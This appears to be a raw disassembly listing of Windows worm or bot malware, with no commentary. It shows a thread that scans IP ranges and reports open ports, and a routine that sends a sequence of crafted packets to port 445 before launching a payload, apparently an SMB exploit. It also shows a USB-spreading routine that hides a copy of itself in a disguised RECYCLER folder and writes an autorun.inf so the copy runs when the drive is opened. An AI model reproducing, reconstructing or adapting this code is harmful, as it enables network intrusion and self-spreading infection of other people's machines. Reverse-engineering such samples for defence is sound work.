jz loc_407267
lea eax, [ebp+var_14]
push 10h
push eax
push edi
call dword_456EBC ; connect
mov ecx, [ebp+var_38]
imul ecx, 2724h
cmp eax, 0FFFFFFFFh
mov dword_46D730[ecx], edi
jz loc_407267
cmp [ebp+var_20], 0
mov edi, offset aTarxm0mtxpp_ ; "tArXm0mtxpp."
mov ebx, offset aMflx2_qu4vy_ ; "mflX2.QU4VY."
mov esi, offset aSSSingleIpSSDO ; "%s %s single Ip: (%s) %s: (%d) open."
jnz short loc_406E8E
cmp [ebp+var_28], 0
jnz short loc_406E94
push [ebp+var_44]
push offset aKbwmi16jfhl ; "KbwMi16jFhl/"
push [ebp+var_30]
call dword_456FDC ; inet_ntoa
push eax
push edi
push ebx
lea eax, [ebp+var_144]
push esi
push eax
push [ebp+arg_0]
call sub_41CE4A
add esp, 20h
loc_406E8E: ; CODE XREF: sub_406D7F+E0�j
cmp [ebp+var_28], 0
jz short loc_406EBB
loc_406E94: ; CODE XREF: sub_406D7F+E6�j
push [ebp+var_44]
push offset aKbwmi16jfhl ; "KbwMi16jFhl/"
push [ebp+var_30]
call dword_456FDC ; inet_ntoa
push eax
push edi
push ebx
lea eax, [ebp+var_144]
push esi
push eax
push [ebp+arg_0]
call sub_41CDD4
add esp, 20h
loc_406EBB: ; CODE XREF: sub_406D7F+113�j
push [ebp+var_30]
call dword_456FDC ; inet_ntoa
push eax
lea eax, [ebp+var_210]
push 10h
push eax
call sub_429BBE
lea eax, [ebp+var_144]
push eax
lea eax, [ebp+var_200]
push 80h
push eax
call sub_429BBE
mov eax, [ebp+var_28]
mov ecx, [ebp+var_38]
and [ebp+var_164], 0
mov [ebp+var_15C], eax
mov eax, [ebp+var_20]
add esp, 18h
mov [ebp+var_158], eax
mov eax, [ebp+var_44]
cmp eax, 87h
mov [ebp+var_16C], eax
mov [ebp+var_168], ecx
jnz loc_40701F
sub esp, 0C4h
lea esi, [ebp+var_210]
lea eax, [ebp+var_144]
push 31h
pop ecx
mov edi, esp
push [ebp+var_14C]
rep movsd
push eax
call sub_403B9B
add esp, 0CCh
test eax, eax
jz short loc_406FBE
xor esi, esi
xor eax, eax
cmp [ebp+var_20], esi
mov [ebp+var_164], eax
jnz short loc_406F91
cmp [ebp+var_28], esi
jnz short loc_406F96
lea eax, [ebp+var_210]
push eax
push offset dword_43A357
push ebx
lea eax, [ebp+var_144]
push offset aSSIpS ; "%s (%s) -> IP: (%s)"
push eax
push [ebp+arg_0]
call sub_41CE4A
mov eax, [ebp+var_164]
add esp, 18h
loc_406F91: ; CODE XREF: sub_406D7F+1E1�j
cmp [ebp+var_28], esi
jz short loc_406FBE
loc_406F96: ; CODE XREF: sub_406D7F+1E6�j
shl eax, 6
lea ecx, [ebp+var_210]
add eax, offset dword_43A357
push ecx
push eax
push ebx
lea eax, [ebp+var_144]
push offset aSSIpS ; "%s (%s) -> IP: (%s)"
push eax
push [ebp+arg_0]
call sub_41CDD4
add esp, 18h
loc_406FBE: ; CODE XREF: sub_406D7F+1D2�j
; sub_406D7F+215�j
sub esp, 0C4h
lea esi, [ebp+var_210]
lea eax, [ebp+var_144]
push 31h
pop ecx
mov edi, esp
push [ebp+var_14C]
rep movsd
push eax
call sub_404134
add esp, 0CCh
test eax, eax
jz loc_407267
push 2
xor esi, esi
cmp [ebp+var_20], esi
pop eax
mov [ebp+var_164], eax
jnz loc_40723A
cmp [ebp+var_28], esi
jnz loc_40723F
lea eax, [ebp+var_210]
push eax
push offset byte_43A3D7
jmp loc_40721C
; ---------------------------------------------------------------------------
loc_40701F: ; CODE XREF: sub_406D7F+19F�j
cmp eax, 8Bh
jnz loc_407126
sub esp, 0C4h
lea esi, [ebp+var_210]
lea eax, [ebp+var_144]
push 31h
pop ecx
mov edi, esp
push [ebp+var_14C]
rep movsd
push eax
call sub_4066E2
add esp, 0CCh
test eax, eax
jz short loc_4070C5
push 4
xor esi, esi
cmp [ebp+var_20], esi
pop eax
mov [ebp+var_164], eax
jnz short loc_407098
cmp [ebp+var_28], esi
jnz short loc_40709D
lea eax, [ebp+var_210]
push eax
push offset byte_43A457
push ebx
lea eax, [ebp+var_144]
push offset aSSIpS ; "%s (%s) -> IP: (%s)"
push eax
push [ebp+arg_0]
call sub_41CE4A
mov eax, [ebp+var_164]
add esp, 18h
loc_407098: ; CODE XREF: sub_406D7F+2E8�j
cmp [ebp+var_28], esi
jz short loc_4070C5
loc_40709D: ; CODE XREF: sub_406D7F+2ED�j
shl eax, 6
lea ecx, [ebp+var_210]
add eax, offset dword_43A357
push ecx
push eax
push ebx
lea eax, [ebp+var_144]
push offset aSSIpS ; "%s (%s) -> IP: (%s)"
push eax
push [ebp+arg_0]
call sub_41CDD4
add esp, 18h
loc_4070C5: ; CODE XREF: sub_406D7F+2D8�j
; sub_406D7F+31C�j
sub esp, 0C4h
lea esi, [ebp+var_210]
lea eax, [ebp+var_144]
push 31h
pop ecx
mov edi, esp
push [ebp+var_14C]
rep movsd
push eax
call sub_4059BF
add esp, 0CCh
test eax, eax
jz loc_407267
push 6
xor esi, esi
cmp [ebp+var_20], esi
pop eax
mov [ebp+var_164], eax
jnz loc_40723A
cmp [ebp+var_28], esi
jnz loc_40723F
lea eax, [ebp+var_210]
push eax
push offset byte_43A4D7
jmp loc_40721C
; ---------------------------------------------------------------------------
loc_407126: ; CODE XREF: sub_406D7F+2A5�j
cmp eax, 1BDh
jnz loc_407267
sub esp, 0C4h
lea esi, [ebp+var_210]
lea eax, [ebp+var_144]
push 31h
pop ecx
mov edi, esp
push [ebp+var_14C]
rep movsd
push eax
call sub_4073A2
add esp, 0CCh
test eax, eax
jz short loc_4071CC
push 0Ah
xor esi, esi
cmp [ebp+var_20], esi
pop eax
mov [ebp+var_164], eax
jnz short loc_40719F
cmp [ebp+var_28], esi
jnz short loc_4071A4
lea eax, [ebp+var_210]
push eax
push offset off_43A5D7
push ebx
lea eax, [ebp+var_144]
push offset aSSIpS ; "%s (%s) -> IP: (%s)"
push eax
push [ebp+arg_0]
call sub_41CE4A
mov eax, [ebp+var_164]
add esp, 18h
loc_40719F: ; CODE XREF: sub_406D7F+3EF�j
cmp [ebp+var_28], esi
jz short loc_4071CC
loc_4071A4: ; CODE XREF: sub_406D7F+3F4�j
shl eax, 6
lea ecx, [ebp+var_210]
add eax, offset dword_43A357
push ecx
push eax
push ebx
lea eax, [ebp+var_144]
push offset aSSIpS ; "%s (%s) -> IP: (%s)"
push eax
push [ebp+arg_0]
call sub_41CDD4
add esp, 18h
loc_4071CC: ; CODE XREF: sub_406D7F+3DF�j
; sub_406D7F+423�j
sub esp, 0C4h
lea esi, [ebp+var_210]
lea eax, [ebp+var_144]
push 31h
pop ecx
mov edi, esp
push [ebp+var_14C]
rep movsd
push eax
call sub_4063C0
add esp, 0CCh
test eax, eax
jz short loc_407267
push 3
xor esi, esi
cmp [ebp+var_20], esi
pop eax
mov [ebp+var_164], eax
jnz short loc_40723A
cmp [ebp+var_28], esi
jnz short loc_40723F
lea eax, [ebp+var_210]
push eax
push offset byte_43A417
loc_40721C: ; CODE XREF: sub_406D7F+29B�j
; sub_406D7F+3A2�j
push ebx
lea eax, [ebp+var_144]
push offset aSSIpS ; "%s (%s) -> IP: (%s)"
push eax
push [ebp+arg_0]
call sub_41CE4A
mov eax, [ebp+var_164]
add esp, 18h
loc_40723A: ; CODE XREF: sub_406D7F+280�j
; sub_406D7F+387�j ...
cmp [ebp+var_28], esi
jz short loc_407267
loc_40723F: ; CODE XREF: sub_406D7F+289�j
; sub_406D7F+390�j ...
shl eax, 6
lea ecx, [ebp+var_210]
add eax, offset dword_43A357
push ecx
push eax
push ebx
lea eax, [ebp+var_144]
push offset aSSIpS ; "%s (%s) -> IP: (%s)"
push eax
push [ebp+arg_0]
call sub_41CDD4
add esp, 18h
loc_407267: ; CODE XREF: sub_406D7F+A2�j
; sub_406D7F+C7�j ...
push 64h
call dword_437190 ; Sleep
push [ebp+var_4]
call dword_456FF0 ; closesocket
loc_407278: ; CODE XREF: sub_406D7F+80�j
; sub_406D7F+99�j
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 4
sub_406D7F endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_407281 proc near ; DATA XREF: sub_40A9FE+665A�o
var_1C0 = byte ptr -1C0h
var_140 = dword ptr -140h
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_2C = dword ptr -2Ch
var_24 = dword ptr -24h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1C0h
push ebx
mov ebx, [ebp+arg_0]
push esi
push edi
push 4Eh
mov esi, ebx
pop ecx
lea edi, [ebp+var_140]
rep movsd
push [ebp+var_140]
lea esi, [ebp+var_140]
mov dword ptr [ebx+130h], 1
sub esp, 138h
push 4Eh
pop ecx
mov edi, esp
rep movsd
call sub_406C69
mov esi, dword_437190
add esp, 13Ch
mov edi, offset aKbwmi16jfhl ; "KbwMi16jFhl/"
loc_4072D6: ; CODE XREF: sub_407281+11C�j
push [ebp+var_38]
push edi
push [ebp+var_24]
call dword_456FDC ; inet_ntoa
push eax
push offset aTarxm0mtxpp_ ; "tArXm0mtxpp."
push edi
push offset aMflx2_qu4vy_ ; "mflX2.QU4VY."
lea eax, [ebp+var_1C0]
push offset aSSSSStartSD ; "%s %s%s: (%s), Start%s: (%d)"
push eax
call sub_429B03
lea eax, [ebp+var_1C0]
push 270Fh
push eax
mov eax, [ebp+var_2C]
imul eax, 2724h
add eax, offset dword_46B010
push eax
call sub_429D10
add esp, 2Ch
lea eax, [ebp+var_8]
lea ecx, [ebp+var_140]
push eax
xor eax, eax
push eax
push ecx
push offset sub_406D7F
push eax
push eax
call dword_437180 ; CreateThread
mov [ebp+var_4], eax
loc_407341: ; CODE XREF: sub_407281+CA�j
cmp [ebp+var_C], 1
jz short loc_40734D
push 32h
call esi ; dword_437190
jmp short loc_407341
; ---------------------------------------------------------------------------
loc_40734D: ; CODE XREF: sub_407281+C4�j
push [ebp+var_4]
call dword_437044 ; CloseHandle
push [ebp+var_34]
and dword ptr [ebx+134h], 0
call esi ; dword_437190
lea eax, [ebp+var_24]
push 4
push eax
lea eax, [ebp+arg_0]
push eax
call sub_429420
add esp, 0Ch
push [ebp+arg_0]
call dword_456E28 ; ntohl
inc eax
push eax
mov [ebp+arg_0], eax
call dword_456F34 ; ntohl
mov [ebp+arg_0], eax
lea eax, [ebp+arg_0]
push 4
push eax
lea eax, [ebp+var_24]
push eax
call sub_429420
add esp, 0Ch
jmp loc_4072D6
sub_407281 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4073A2 proc near ; CODE XREF: sub_406D7F+3D2�p
var_11B4 = byte ptr -11B4h
var_1024 = byte ptr -1024h
var_101B = byte ptr -101Bh
var_1008 = dword ptr -1008h
var_1004 = dword ptr -1004h
var_FFA = dword ptr -0FFAh
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
arg_B4 = dword ptr 0BCh
arg_BC = dword ptr 0C4h
arg_C4 = dword ptr 0CCh
push ebp
mov ebp, esp
mov eax, 11B4h
call sub_429B60
push ebx
push esi
lea eax, [ebp+var_11B4]
push edi
push eax
push 2
call dword_4372B8 ; WSAStartup
test eax, eax
jnz loc_4079A3
lea eax, [ebp+arg_8]
push 5
push eax
call sub_404525
pop ecx
cmp eax, 3
pop ecx
mov [ebp+var_4], eax
jnz short loc_407406
lea eax, [ebp+arg_8]
push 6
push eax
call sub_404525
xor ebx, ebx
pop ecx
cmp eax, ebx
pop ecx
mov [ebp+var_4], eax
jnz short loc_407408
lea eax, [ebp+arg_8]
push 5
push eax
call sub_404525
pop ecx
mov [ebp+var_4], eax
pop ecx
jmp short loc_407408
; ---------------------------------------------------------------------------
loc_407406: ; CODE XREF: sub_4073A2+3A�j
xor ebx, ebx
loc_407408: ; CODE XREF: sub_4073A2+50�j
; sub_4073A2+62�j
push 6
push 1
push 2
call dword_456FD0 ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+var_C], edi
jz loc_4079A3
lea eax, [ebp+arg_8]
mov [ebp+var_24], 2
push eax
call dword_456F7C ; inet_addr
push 1BDh
mov [ebp+var_20], eax
call dword_456F38 ; ntohs
mov [ebp+var_22], ax
lea eax, [ebp+var_24]
push 10h
push eax
push edi
call dword_456EBC ; connect
cmp eax, 0FFFFFFFFh
jz loc_40799C
push ebx
push 89h
push offset dword_43E2C0
push edi
call dword_456F8C ; send
cmp eax, 0FFFFFFFFh
jz loc_40799C
mov esi, 1000h
push ebx
lea eax, [ebp+var_1024]
push esi
push eax
push edi
call dword_456F58 ; recv
cmp eax, 1
jl loc_40799C
push ebx
push 0BDh
push offset dword_43E350
push edi
call dword_456F8C ; send
cmp eax, 0FFFFFFFFh
jz loc_40799C
push ebx
lea eax, [ebp+var_1024]
push esi
push eax
push edi
call dword_456F58 ; recv
cmp eax, 0Ah
jle loc_40799C
mov eax, [ebp+var_1004]
push 2
mov [ebp+var_8], eax
lea eax, [ebp+var_8]
push eax
push offset dword_43E430
call sub_429420
add esp, 0Ch
push ebx
push 111h
push offset dword_43E410
push edi
call dword_456F8C ; send
cmp eax, 0FFFFFFFFh
jz loc_40799C
push ebx
lea eax, [ebp+var_1024]
push esi
push eax
push edi
call dword_456F58 ; recv
cmp eax, 0Ah
jle loc_40799C
push ebx
push 6Fh
push offset dword_43E528
push edi
call dword_456F8C ; send
cmp eax, 0FFFFFFFFh
jz loc_40799C
push ebx
lea eax, [ebp+var_1024]
push esi
push eax
push edi
call dword_456F58 ; recv
cmp eax, 0Ah
jle loc_40799C
mov eax, [ebp+var_1004]
push 2
mov [ebp+var_8], eax
lea eax, [ebp+var_8]
push eax
push offset dword_43E5B8
call sub_429420
add esp, 0Ch
push ebx
push 3Bh
push offset dword_43E598
push edi
call dword_456F8C ; send
cmp eax, 0FFFFFFFFh
jz loc_40799C
push ebx
lea eax, [ebp+var_1024]
push esi
push eax
push edi
call dword_456F58 ; recv
cmp eax, 0Ah
jle loc_40799C
cmp [ebp+var_101B], 0
jnz loc_40799C
mov eax, [ebp+var_1008]
push 2
mov [ebp+var_10], eax
lea eax, [ebp+var_10]
push eax
push offset dword_43E5F4
call sub_429420
lea eax, [ebp+var_8]
push 2
push eax
push offset dword_43E5F8
call sub_429420
add esp, 18h
push ebx
push 6Ah
push offset dword_43E5D8
push edi
call dword_456F8C ; send
cmp eax, 0FFFFFFFFh
jz loc_40799C
push ebx
lea eax, [ebp+var_1024]
push esi
push eax
push edi
call dword_456F58 ; recv
cmp eax, 0Ah
jle loc_40799C
cmp [ebp+var_101B], 0
jnz loc_40799C
mov eax, [ebp+var_FFA]
push 2
mov [ebp+var_14], eax
lea eax, [ebp+var_10]
push eax
push offset dword_43E664
call sub_429420
lea eax, [ebp+var_8]
push 2
push eax
push offset dword_43E668
call sub_429420
lea eax, [ebp+var_14]
push 2
push eax
push offset byte_43E671
call sub_429420
add esp, 24h
push ebx
push 243h
push offset dword_43E648
push edi
call dword_456F8C ; send
cmp eax, 0FFFFFFFFh
jz loc_40799C
push ebx
lea eax, [ebp+var_1024]
push esi
push eax
push edi
call dword_456F58 ; recv
cmp eax, 0Ah
jle loc_40799C
cmp [ebp+var_101B], 0
jnz loc_40799C
lea eax, [ebp+var_10]
push 2
push eax
push offset dword_43E8AC
call sub_429420
lea eax, [ebp+var_8]
push 2
push eax
push offset dword_43E8B0
call sub_429420
lea eax, [ebp+var_14]
push 2
push eax
push offset byte_43E8B9
call sub_429420
add esp, 24h
push ebx
push 3Fh
push offset dword_43E890
push edi
call dword_456F8C ; send
cmp eax, 0FFFFFFFFh
jz loc_40799C
push ebx
lea eax, [ebp+var_1024]
push esi
push eax
push edi
call dword_456F58 ; recv
cmp eax, 0Ah
jle loc_40799C
cmp [ebp+var_101B], 0
jnz loc_40799C
lea eax, [ebp+var_10]
push 2
push eax
push offset dword_43E8EC
call sub_429420
lea eax, [ebp+var_8]
push 2
push eax
push offset dword_43E8F0
call sub_429420
lea eax, [ebp+var_14]
push 2
push eax
push offset byte_43E8F9
call sub_429420
push dword_43EC60
push offset dword_43A8E8
push offset byte_43E9E1
call sub_429420
add esp, 30h
cmp [ebp+var_4], 2
mov ebx, offset byte_43EB61
mov edi, offset byte_43EB65
mov esi, offset byte_43EB6D
jnz short loc_407781
push 4
push offset dword_43EBDC
push ebx
call sub_429420
push 4
push offset dword_43EBD8
push edi
call sub_429420
push 4
push offset dword_43EBD4
push esi
call sub_429420
add esp, 24h
loc_407781: ; CODE XREF: sub_4073A2+3B3�j
cmp [ebp+var_4], 3
jnz short loc_4077B1
push 4
push offset dword_43EBEC
push ebx
call sub_429420
push 4
push offset dword_43EBE8
push edi
call sub_429420
push 4
push offset dword_43EBE4
push esi
call sub_429420
add esp, 24h
loc_4077B1: ; CODE XREF: sub_4073A2+3E3�j
cmp [ebp+var_4], 4
jnz short loc_4077E1
push 4
push offset dword_43EBFC
push ebx
call sub_429420
push 4
push offset dword_43EBF8
push edi
call sub_429420
push 4
push offset dword_43EBF4
push esi
call sub_429420
add esp, 24h
loc_4077E1: ; CODE XREF: sub_4073A2+413�j
cmp [ebp+var_4], 5
jnz short loc_407811
push 4
push offset dword_43EC0C
push ebx
call sub_429420
push 4
push offset dword_43EC08
push edi
call sub_429420
push 4
push offset dword_43EC04
push esi
call sub_429420
add esp, 24h
loc_407811: ; CODE XREF: sub_4073A2+443�j
cmp [ebp+var_4], 6
jnz short loc_407841
push 4
push offset dword_43EC1C
push ebx
call sub_429420
push 4
push offset dword_43EC18
push edi
call sub_429420
push 4
push offset dword_43EC14
push esi
call sub_429420
add esp, 24h
loc_407841: ; CODE XREF: sub_4073A2+473�j
cmp [ebp+var_4], 7
jnz short loc_407871
push 4
push offset dword_43EC2C
push ebx
call sub_429420
push 4
push offset dword_43EC28
push edi
call sub_429420
push 4
push offset dword_43EC24
push esi
call sub_429420
add esp, 24h
loc_407871: ; CODE XREF: sub_4073A2+4A3�j
cmp [ebp+var_4], 8
jnz short loc_4078A1
push 4
push offset dword_43EC3C
push ebx
call sub_429420
push 4
push offset dword_43EC38
push edi
call sub_429420
push 4
push offset dword_43EC34
push esi
call sub_429420
add esp, 24h
loc_4078A1: ; CODE XREF: sub_4073A2+4D3�j
xor ebx, ebx
push ebx
push 2FFh
push offset dword_43E8D0
push [ebp+var_C]
call dword_456F8C ; send
cmp eax, 0FFFFFFFFh
jz loc_407997
movzx eax, word_44399E
push eax
lea esi, [ebp+arg_8]
sub esp, 0C4h
push 31h
pop ecx
mov edi, esp
rep movsd
call sub_401B6E
add esp, 0C8h
test eax, eax
jz short loc_407964
mov edx, [ebp+arg_B4]
mov edi, offset aMflx2_qu4vy_ ; "mflX2.QU4VY."
mov eax, edx
mov esi, offset aSSSExD ; "%s %s -> %s (Ex: %d)"
shl eax, 6
lea ecx, dword_43A380[eax]
inc dword ptr [ecx]
cmp [ebp+arg_C4], ebx
mov ecx, [ecx]
jz short loc_407938
cmp [ebp+arg_BC], ebx
jnz short loc_407940
push ecx
lea ecx, [ebp+arg_8]
lea eax, dword_43A357[eax]
push ecx
push eax
push edi
push esi
push [ebp+arg_0]
push [ebp+arg_4]
call sub_41CE4A
mov edx, [ebp+arg_B4]
add esp, 1Ch
loc_407938: ; CODE XREF: sub_4073A2+56A�j
cmp [ebp+arg_BC], ebx
jz short loc_407964
loc_407940: ; CODE XREF: sub_4073A2+572�j
shl edx, 6
lea eax, [ebp+arg_8]
push dword_43A380[edx]
push eax
lea eax, dword_43A357[edx]
push eax
push edi
push esi
push [ebp+arg_0]
push [ebp+arg_4]
call sub_41CDD4
add esp, 1Ch
loc_407964: ; CODE XREF: sub_4073A2+543�j
; sub_4073A2+59C�j
push ebx
lea eax, [ebp+var_1024]
push 1000h
push eax
push [ebp+var_C]
call dword_456F58 ; recv
cmp eax, 0Ah
jle short loc_407997
cmp [ebp+var_101B], 0
jnz short loc_407997
lea eax, [ebp+arg_8]
push eax
call sub_401E9E
xor eax, eax
pop ecx
inc eax
jmp short loc_4079A5
; ---------------------------------------------------------------------------
loc_407997: ; CODE XREF: sub_4073A2+518�j
; sub_4073A2+5DB�j ...
push [ebp+var_C]
jmp short loc_40799D
; ---------------------------------------------------------------------------
loc_40799C: ; CODE XREF: sub_4073A2+B2�j
; sub_4073A2+CD�j ...
push edi
loc_40799D: ; CODE XREF: sub_4073A2+5F8�j
call dword_456FF0 ; closesocket
loc_4079A3: ; CODE XREF: sub_4073A2+21�j
; sub_4073A2+7A�j
xor eax, eax
loc_4079A5: ; CODE XREF: sub_4073A2+5F3�j
pop edi
pop esi
pop ebx
leave
retn
sub_4073A2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4079AA proc near ; CODE XREF: sub_407E4B+A9�p
var_502C = byte ptr -502Ch
var_502B = byte ptr -502Bh
var_291C = byte ptr -291Ch
var_291B = byte ptr -291Bh
var_20C = byte ptr -20Ch
var_108 = byte ptr -108h
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 502Ch
call sub_429B60
and [ebp+var_291C], 0
push ebx
push esi
mov edx, 9C3h
push edi
mov ecx, edx
xor eax, eax
lea edi, [ebp+var_291B]
rep stosd
and [ebp+var_502C], 0
mov ecx, edx
stosw
stosb
xor eax, eax
lea edi, [ebp+var_502B]
rep stosd
stosw
push 1
stosb
call dword_457004 ; SetErrorMode
push 2
call dword_457004 ; SetErrorMode
push 8000h
call dword_457004 ; SetErrorMode
push [ebp+arg_0]
mov esi, dword_437090
lea eax, [ebp+var_291C]
push eax
call esi ; dword_437090
lea eax, [ebp+var_291C]
push offset aRecycler ; "\\RECYCLER"
push eax
call esi ; dword_437090
lea eax, [ebp+var_291C]
push 0
push eax
call dword_43708C ; CreateDirectoryA
test eax, eax
jnz short loc_407A3F
call dword_437170 ; RtlGetLastWin32Error
loc_407A3F: ; CODE XREF: sub_4079AA+8D�j
mov ebx, dword_437068
lea eax, [ebp+var_291C]
push 7
push eax
call ebx ; dword_437068
call sub_429B9C
push 9
pop edi
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429B9C
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429B9C
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429B9C
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429B9C
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429B9C
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429B9C
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429B9C
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429B9C
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429B9C
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429B9C
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429B9C
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429B9C
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429B9C
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429B9C
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429B9C
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429B9C
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429B9C
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429B9C
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429B9C
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429B9C
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429B9C
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429B9C
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429B9C
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429B9C
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429B9C
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429B9C
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429B9C
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429B9C
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429B9C
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429B9C
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429B9C
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429B9C
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429B9C
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429B9C
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429B9C
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429B9C
cdq
mov ecx, edi
idiv ecx
lea eax, [ebp+var_20C]
push edx
push offset aSDDDDDDDDDDDDD ; "\\S-%d-%d-%d%d-%d%d%d%d%d%d%d%d%d%d-%d%d"...
push 104h
push eax
call sub_429BBE
add esp, 0A0h
lea eax, [ebp+var_20C]
push eax
lea eax, [ebp+var_291C]
push eax
call esi ; dword_437090
lea eax, [ebp+var_291C]
push 0
push eax
call dword_43708C ; CreateDirectoryA
test eax, eax
jnz short loc_407C2F
call dword_437170 ; RtlGetLastWin32Error
loc_407C2F: ; CODE XREF: sub_4079AA+27D�j
lea eax, [ebp+var_291C]
push 7
push eax
call ebx ; dword_437068
lea eax, [ebp+var_291C]
push offset aDesktop_ini ; "\\Desktop.ini"
push eax
call esi ; dword_437090
xor eax, eax
push eax
push 6
push 2
push eax
push eax
lea eax, [ebp+var_291C]
push 40000000h
push eax
call dword_43705C ; CreateFileA
cmp eax, 1
mov [ebp+var_4], eax
jb loc_407E11
lea ecx, [ebp+var_8]
push 0
push ecx
push 3Fh
push offset a_shellclassinf ; "[.ShellClassInfo]\r\nCLSID={645FF040-5081"...
push eax
call dword_437078 ; WriteFile
test eax, eax
jnz short loc_407C91
mov edi, [ebp+var_4]
xor esi, esi
jmp loc_407E3D
; ---------------------------------------------------------------------------
loc_407C91: ; CODE XREF: sub_4079AA+2DB�j
push [ebp+var_4]
call dword_437044 ; CloseHandle
lea eax, [ebp+var_291C]
push eax
call dword_437088 ; lstrlenA
lea eax, [ebp+eax+var_291C]
jmp short loc_407CB1
; ---------------------------------------------------------------------------
loc_407CB0: ; CODE XREF: sub_4079AA+30A�j
dec eax
loc_407CB1: ; CODE XREF: sub_4079AA+304�j
cmp byte ptr [eax], 5Ch
jnz short loc_407CB0
and byte ptr [eax+1], 0
call sub_429B9C
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429B9C
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429B9C
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429B9C
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429B9C
cdq
idiv edi
lea eax, [ebp+var_108]
push edx
push offset dword_4439B4
push offset aSDDDDD_exe ; "%s%d%d%d%d%d.exe"
push 100h
push eax
call sub_429BBE
add esp, 24h
lea eax, [ebp+var_108]
push eax
lea eax, [ebp+var_291C]
push eax
call esi ; dword_437090
lea eax, [ebp+var_502C]
push 270Fh
push eax
push 0
call dword_43717C ; GetModuleFileNameA
lea eax, [ebp+var_291C]
push 1
push eax
lea eax, [ebp+var_502C]
push eax
call dword_437064 ; CopyFileA
mov [ebp+var_4], eax
lea eax, [ebp+var_291C]
push 7
push eax
call ebx ; dword_437068
mov ecx, 9C4h
xor eax, eax
cmp [ebp+var_291C], 5Ch
lea edi, [ebp+var_502C]
rep stosd
lea edi, [ebp+var_291C]
jz short loc_407D79
loc_407D73: ; CODE XREF: sub_4079AA+3CD�j
inc edi
cmp byte ptr [edi], 5Ch
jnz short loc_407D73
loc_407D79: ; CODE XREF: sub_4079AA+3C7�j
lea eax, [ebp+var_502C]
push offset aAutorunOpen ; "[autorun]\r\nopen="
push eax
inc edi
call esi ; dword_437090
lea eax, [ebp+var_502C]
push edi
push eax
call esi ; dword_437090
lea eax, [ebp+var_502C]
push offset aIconSystemroot ; "\r\nicon=%SystemRoot%\\system32\\SHELL32.dl"...
push eax
call esi ; dword_437090
lea eax, [ebp+var_502C]
push edi
push eax
call esi ; dword_437090
lea eax, [ebp+var_502C]
push offset aShellOpenDefau ; "\r\nshell\\open\\default=1"
push eax
call esi ; dword_437090
push [ebp+arg_0]
mov ecx, 9C4h
xor eax, eax
lea edi, [ebp+var_291C]
rep stosd
lea eax, [ebp+var_291C]
push eax
call esi ; dword_437090
lea eax, [ebp+var_291C]
push offset dword_43EC64
push eax
call esi ; dword_437090
lea eax, [ebp+var_291C]
push 80h
push eax
call ebx ; dword_437068
xor esi, esi
lea eax, [ebp+var_291C]
push esi
push 7
push 2
push esi
push esi
push 40000000h
push eax
call dword_43705C ; CreateFileA
mov edi, eax
cmp edi, 1
jnb short loc_407E15
loc_407E11: ; CODE XREF: sub_4079AA+2BF�j
xor eax, eax
jmp short loc_407E46
; ---------------------------------------------------------------------------
loc_407E15: ; CODE XREF: sub_4079AA+465�j
lea eax, [ebp+var_8]
push esi
push eax
lea eax, [ebp+var_502C]
push eax
call dword_437088 ; lstrlenA
push eax
lea eax, [ebp+var_502C]
push eax
push edi
call dword_437078 ; WriteFile
test eax, eax
jz short loc_407E3D
mov esi, [ebp+var_4]
loc_407E3D: ; CODE XREF: sub_4079AA+2E2�j
; sub_4079AA+48E�j
push edi
call dword_437044 ; CloseHandle
mov eax, esi
loc_407E46: ; CODE XREF: sub_4079AA+469�j
pop edi
pop esi
pop ebx
leave
retn
sub_4079AA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
